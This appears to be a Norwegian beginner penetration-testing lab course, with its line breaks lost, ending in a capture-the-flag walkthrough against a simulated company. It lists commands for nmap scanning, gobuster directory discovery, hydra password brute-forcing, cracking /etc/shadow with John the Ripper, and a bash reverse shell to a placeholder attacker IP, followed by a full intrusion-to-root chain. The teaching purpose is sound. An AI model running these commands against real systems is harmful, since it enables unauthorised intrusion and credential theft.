Lær verktøyene profesjonelle angripere bruker — steg for steg fra nybegynner til et komplett CTF-angrep mot en simulert bedrift.
Kali Linux er et spesialisert Linux-distro laget for penetrasjonstesting. Alt skjer i terminalen. Bli komfortabel her — du vil bruke den i alle andre labber.
whoami og idpwd, ls, ls -la, cd /ip a og ifconfigls /usr/bin | grep nmapman nmap (trykk q for å avslutte)root — det betyr full tilgang til alt på maskinen. Med stor makt følger stort ansvar. Bruk alltid Kali kun i lab-miljøer./home/kali — din hjemmemappe/usr/bin — installerte programmer/etc — konfigurasjonsfiler/var/log — loggernmap (Network Mapper) er det første verktøyet en pentester bruker. Det kartlegger hvilke maskiner som er oppe, hvilke porter som er åpne, og hvilke tjenester som kjører.
nmap 10.10.10.50-T4: nmap -T4 10.10.10.50nmap -sV 10.10.10.50nmap -O 10.10.10.50nmap -A 10.10.10.50-sV = versjonsskanning (hva kjører på porten?)-sC = kjør standard scripts-O = operativsystem-deteksjon-p- = skann ALLE 65535 porter-T4 = raskere timing (T1=stille, T5=aggressiv)-A = alt på én gangnmap -T4 -p- [IP] — finn alle åpne porternmap -sV -sC -p [porter] [IP] — finn versjonerGobuster prøver systematisk tusenvis av vanlige katalognavn mot en webserver. Mange nettsider har skjulte administrasjonspaneler, backup-filer og config-filer som ikke er linket noe sted.
gobuster dir -u http://10.10.10.50 -w wordlist.txtcurl http://10.10.10.50/admin200 = OK — katalogen eksisterer og er tilgjengelig301 = Redirect — eksisterer, peker videre403 = Forbidden — eksisterer, men tilgang nektet (interessant!)404 = Not Found — eksisterer ikke403 er faktisk nyttig — den bekrefter at katalogen finnes./admin — 200 OK, innloggingspanel/backup — 403 Forbidden (eksisterer!)/config.php.bak — 200 OK (backup-fil!)Hydra prøver systematisk brukernavn/passord-kombinasjoner mot tjenester. Fra nmap vet vi at SSH kjører på port 22. Fra nettsiden vet vi brukeren heter admin.
hydra -l admin -P passwords.txt ssh://10.10.10.50hydra -l admin -P passwords.txt 10.10.10.50 http-post-form "/admin:user=^USER^&pass=^PASS^:Invalid"-l = ett brukernavn-L = fil med brukernavn-p = ett passord-P = fil med passord (wordlist)-t = antall parallelle tråder/usr/share/wordlists/rockyou.txtadmin:password123Du har fått tak i /etc/shadow fra InnoTech-serveren. Filen inneholder hashed passord. John the Ripper prøver å knekke dem med en wordlist.
cat shadow.txtjohn --wordlist=rockyou.txt shadow.txtjohn --show shadow.txtjohn --wordlist=rockyou.txt --rules shadow.txtpassword → Password1, p@ssw0rd, PASSWORD osv.--format=sha256, --format=bcrypt osv.toor (trivielt — standard Kali-passord!)password123Summer2023!Netcat kan lytte på porter, koble til tjenester, sende filer og sette opp reverse shells. Det er sannsynligvis det mest brukte verktøyet i en angripers arsenal.
nc 10.10.10.50 80 — deretter GET / HTTP/1.0nc -lvnp 4444nc -lvnp 4444 + se hva som kobler tilnc -lvnp 4444 = listen, verbose, no DNS, port 4444bash -i >& /dev/tcp/ANGRIPERS_IP/4444 0>&1nc -lvnp 4444.Alt du har lært — nmap, gobuster, hydra, john, netcat — brukes nå mot InnoTech AS. Du starter med kun én IP-adresse. Finn alle 3 flagg.
nmap -sV 10.10.10.50gobuster dir -u http://10.10.10.50 -w wordlist.txtcurl http://10.10.10.50/secrethydra -l admin -P passwords.txt ssh://10.10.10.50ssh admin@10.10.10.50 (passord: password123)cat /var/www/html/config.phpjohn --wordlist=rockyou.txt db_hashes.txtsudo -l → sudo sucat /root/flag.txt